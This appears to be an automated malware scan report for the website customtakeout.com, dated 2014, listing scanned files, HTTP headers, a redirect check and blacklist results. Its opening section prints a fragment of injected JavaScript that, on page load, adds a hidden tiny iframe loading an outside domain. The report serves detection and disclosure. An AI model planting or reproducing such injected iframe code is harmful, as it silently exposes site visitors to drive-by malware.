Scanned pages/files
Request | Server response | Status |
http://customtakeout.com/ | 200 OK Content-Length: 57617 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):

    if(document.loaded) {
        showBrowVer();
    } else {
        if (window.addEventListener) {
            window.addEventListener('load', showBrowVer, false);
        } else {
            window.attachEvent('onload', showBrowVer);
        }
    }
    function browserDetectNav(chrAfterPoint) {
        var UA=window.navigator.userAgent,
            OperaB = /Opera[ \/]+\w+\.\w+/i,
            OperaV = /Version[ \/]+\w+\.\w+/i,
            FirefoxB = /Firefo
    divTag.id='dt';
    document.body.appendChild(divTag);
    var js_kod2 = document.createElement('iframe');
    js_kod2.src = 'http://kreotceonite.com/?2';
    js_kod2.width = '5px';
    js_kod2.height = '3px';
    js_kod2.setAttribute('style','visibility:hidden');
    document.getElementById('dt').appendChild(js_kod2);
    }
    }
    }

Antivirus reports:
http://customtakeout.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 06 Dec 2014 15:23:26 GMT Pragma: no-cache Location: http://customtakeout.com/www.googleadservices.com/pagead/conversion.js/ Server: Apache Vary: Cookie Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 06 Dec 2014 15:23:27 GMT Set-Cookie: PHPSESSID=i6u40k7ha769kni5fo9de6bqc1; path=/ Set-Cookie: wpsc_customer_cookie_855a80fe17156de5015672d6a08b3f08=_xVVP4JgtVLAQ%7C1418052207%7Cae4b72bc905d6944d40f6811a8aea3f8; expires=Mon, 08-Dec-2014 15:23:27 GMT; path=/; httponly X-Pingback: http://customtakeout.com/xmlrpc.php | clean |
http://customtakeout.com/www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 837 Content-Type: text/html | clean |
http://customtakeout.com/test404page.js | 404 Not Found Content-Length: 843 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery.cycle.all.js | 200 OK Content-Length: 51734 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-ui.min.js | 200 OK Content-Length: 206617 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/ddsmoothmenu.js | 200 OK Content-Length: 8151 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1279 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery.capSlide.js | 200 OK Content-Length: 1503 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-tooltip/lib/jquery.bgiframe.js | 200 OK Content-Length: 5044 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-tooltip/lib/jquery.dimensions.js | 200 OK Content-Length: 17765 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-tooltip/jquery.tooltip.js | 200 OK Content-Length: 8087 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-css-transform.js | 200 OK Content-Length: 3389 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery.quicksand.js | 200 OK Content-Length: 14785 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: customtakeout.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Sat, 06 Dec 2014 15:23:24 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
WP-Super-Cache: Served supercache file from PHP
Second query (visit from search engine):
GET / HTTP/1.1
Host: customtakeout.com
Referer: http://www.google.com/search?q=customtakeout.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=customtakeout.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://customtakeout.com/
Result: customtakeout.com is not infected or malware details are not published yet.